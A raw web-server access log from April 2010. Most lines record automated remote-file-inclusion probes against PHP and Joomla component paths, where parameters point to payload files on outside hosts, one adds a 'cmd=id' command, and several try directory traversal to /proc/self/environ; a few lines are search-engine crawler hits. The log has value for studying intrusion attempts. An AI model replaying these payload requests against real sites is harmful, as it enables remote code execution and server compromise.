216.121.63.153 - - [07/Apr/2010:03:22:30 -0500] "GET /logs/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:30 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:45 -0500] "GET /index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:45 -0500] "GET /index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:45 -0500] "GET /logs/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:45 -0500] "GET /logs/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:45 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:03:22:46 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [07/Apr/2010:03:26:39 -0500] "GET /logs/access_log.1261267200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.210.218.31 - - [07/Apr/2010:03:30:33 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_06"
207.58.170.67 - - [07/Apr/2010:03:31:24 -0500] "GET //config/dbutil.bck.php?confdir=http://www.thecalling.co.kr/2010/.coke/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.58.170.67 - - [07/Apr/2010:03:31:24 -0500] "GET /logs/access_log.1220054400//config/dbutil.bck.php?confdir=http://www.thecalling.co.kr/2010/.coke/id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.58.170.67 - - [07/Apr/2010:03:31:30 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.thecalling.co.kr/2010/.coke/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:32:23 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:32:23 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:32:24 -0500] "GET /phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:32:25 -0500] "GET /phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:32:25 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:32:25 -0500] "GET /logs/access_log.1219708800%20%20/phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.76.118.170 - - [07/Apr/2010:03:33:44 -0500] "GET /logs/access_log.1220054400//modules/My_eGallery/public/displayCategory.php?basepath=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 358 "-""libwww-perl/5.816"
82.76.118.170 - - [07/Apr/2010:03:33:45 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 331 "-""libwww-perl/5.816"
82.76.118.170 - - [07/Apr/2010:03:33:45 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 336 "-""libwww-perl/5.816"
79.98.23.9 - - [07/Apr/2010:03:33:52 -0500] "GET /logs/access_log.1219449600%20%20/phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:35:15 -0500] "GET /logs/access_log.1219449600/?sourcedir=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:35:15 -0500] "GET /?sourcedir=http://llall.interfree.it/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:35:19 -0500] "GET /logs/?sourcedir=http://llall.interfree.it/id1.txt?? HTTP/1.1" 200 805 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:03:35:24 -0500] "GET /logs/access_log.1223164800/?sourcedir=http://llall.interfree.it/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:35:24 -0500] "GET /logs/access_log.1219449600%20%20/phphtml.php?htmlclass_path=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:37:24 -0500] "GET //skin/jiyoo_red/view.php?view[use_category]=1&dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:37:24 -0500] "GET /logs/access_log.1258329600//skin/jiyoo_red/view.php?view[use_category]=1&dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:37:24 -0500] "GET /logs//skin/jiyoo_red/view.php?view[use_category]=1&dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:37:43 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:37:43 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:37:43 -0500] "GET /logs/access_log.1223164800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.13.85 - - [07/Apr/2010:03:38:07 -0500] "GET /logs/access_log.1214179200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.165.195.229 - - [07/Apr/2010:03:38:08 -0500] "GET /logs/access_log.1219363200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.7.108.203 - - [07/Apr/2010:03:38:23 -0500] "GET /logs/access_log.1220054400//modules/My_eGallery/public/displayCategory.php?basepath=http://playersinn.com/darts/id? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
207.7.108.203 - - [07/Apr/2010:03:38:23 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://playersinn.com/darts/id? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
207.7.108.203 - - [07/Apr/2010:03:38:23 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://playersinn.com/darts/id? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
212.227.141.53 - - [07/Apr/2010:03:38:31 -0500] "GET ///skin/uks_qnaboard_v3010/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:38:31 -0500] "GET /logs///skin/uks_qnaboard_v3010/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:38:31 -0500] "GET /logs/access_log.1257120000///skin/uks_qnaboard_v3010/setup.php?dir=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:38:34 -0500] "GET //skin/jiyoo_red/view.php?view[use_category]=1&dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:38:35 -0500] "GET /logs//skin/jiyoo_red/view.php?view[use_category]=1&dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.227.141.53 - - [07/Apr/2010:03:38:35 -0500] "GET /logs/access_log.1258329600//skin/jiyoo_red/view.php?view[use_category]=1&dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:03:40:36 -0500] "GET /logs//allopass-error.php?mosConfig_live_site=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:03:40:36 -0500] "GET //allopass-error.php?mosConfig_live_site=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:03:40:36 -0500] "GET /logs/access_log.1219708800%20%20//allopass-error.php?mosConfig_live_site=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
202.69.230.122 - - [07/Apr/2010:03:41:35 -0500] "GET /logs/access_log.1214784000%20%20//allopass-error.php?mosConfig_live_site=http://s-suidou.com/.dcms_mngs/.support/id-1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:43:55 -0500] "GET /logs/access_log.1223164800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:43:55 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:43:55 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:44:09 -0500] "GET /logs/access_log.1219363200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:44:43 -0500] "GET //step_one.php?server_inc=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:44:43 -0500] "GET /logs/access_log.1258416000//step_one.php?server_inc=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:44:43 -0500] "GET /logs//step_one.php?server_inc=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
79.98.23.9 - - [07/Apr/2010:03:44:43 -0500] "GET /logs/access_log.1244073600//step_one.php?server_inc=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
123.125.68.77 - - [07/Apr/2010:03:48:42 -0500] "GET /logs/access_log.1258329600 HTTP/1.1" 404 310 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.19.4.18 - - [07/Apr/2010:03:51:46 -0500] "GET /logs/access_log.1219708800//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
203.19.4.18 - - [07/Apr/2010:03:51:49 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
203.19.4.18 - - [07/Apr/2010:03:51:52 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dkmajolika.cz/main??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
188.165.195.229 - - [07/Apr/2010:03:55:48 -0500] "GET /logs/access_log.1223164800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:55:48 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:55:48 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:03:56:07 -0500] "GET /logs/access_log.1219363200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
80.246.53.10 - - [07/Apr/2010:03:56:16 -0500] "GET /logs/?sourcedir=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 200 805 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:16 -0500] "GET /?sourcedir=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 200 1003 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:17 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:17 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 805 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:17 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 805 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:17 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1003 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:17 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.246.53.10 - - [07/Apr/2010:03:56:17 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
212.253.59.109 - - [07/Apr/2010:04:00:48 -0500] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aventura-ecologica.com/toolz.dat?&list=1&cmd=id HTTP/1.0" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
116.122.36.61 - - [07/Apr/2010:04:00:51 -0500] "GET /logs/access_log.1264291200////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:00:51 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 812 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:00:51 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [07/Apr/2010:04:01:20 -0500] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://uchiha1.fileave.com/id1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.190.102.21 - - [07/Apr/2010:04:01:20 -0500] "GET /logs/access_log.1218240000//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://uchiha1.fileave.com/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.190.102.21 - - [07/Apr/2010:04:01:20 -0500] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://uchiha1.fileave.com/id1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.190.102.21 - - [07/Apr/2010:04:01:31 -0500] "GET /logs/access_log.1253836800//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://uchiha1.fileave.com/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:04:01:51 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shellhttp://n1ngas.hdfree.com.br/test.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.129.228.250 - - [07/Apr/2010:04:01:51 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shellhttp://n1ngas.hdfree.com.br/test.txt? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
116.122.36.61 - - [07/Apr/2010:04:03:03 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:03:03 -0500] "GET /logs/access_log.1264291200////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:03:03 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 812 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:03:35 -0500] "GET /logs//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:03:35 -0500] "GET //galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:03:35 -0500] "GET /logs/access_log.1255046400//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:04:09 -0500] "GET /logs/access_log.1240358400//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:05:34 -0500] "GET //galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:05:34 -0500] "GET /logs/access_log.1267920000%20%20//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:05:34 -0500] "GET /logs//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:06:00 -0500] "GET //galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:06:00 -0500] "GET /logs/access_log.1267920000//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:04:06:00 -0500] "GET /logs//galeria.php?start=0&kategoria=http://ppepp.interfree.it/FxID1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.46.199.189 - - [07/Apr/2010:04:09:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.97 - - [07/Apr/2010:04:13:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.129.228.250 - - [07/Apr/2010:04:14:18 -0500] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=shellhttp://n1ngas.hdfree.com.br/test.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
174.129.228.250 - - [07/Apr/2010:04:14:18 -0500] "GET //components/com_performs/performs.php?mosConfig_absolute_path=shellhttp://n1ngas.hdfree.com.br/test.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.97.241.67 - - [07/Apr/2010:04:15:32 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 200 805 "-""Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:04:15:32 -0500] "GET /logs/access_log.1218240000/?DOCUMENT_ROOT=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:04:15:32 -0500] "GET /?DOCUMENT_ROOT=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
218.97.241.67 - - [07/Apr/2010:04:15:32 -0500] "GET /logs/access_log.1231804800/?DOCUMENT_ROOT=http://www.samer1.net/space/chat/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:15:52 -0500] "GET /logs/index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:15:52 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:15:52 -0500] "GET /index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:15:58 -0500] "GET /index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:15:58 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:15:58 -0500] "GET /logs/index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:16:02 -0500] "GET /index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:16:02 -0500] "GET /logs/index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:04:16:02 -0500] "GET /logs/access_log.1268265600%20%20/index0.php?show=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:16:55 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:16:58 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:00 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:00 -0500] "GET /logs/access_log.1210464000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:02 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:02 -0500] "GET /logs/access_log.1210464000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:11 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:11 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:11 -0500] "GET /logs/access_log.1241481600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:12 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:12 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:13 -0500] "GET /logs/access_log.1241481600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:17 -0500] "GET /logs/access_log.1217548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:04:17:29 -0500] "GET /logs/access_log.1217548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
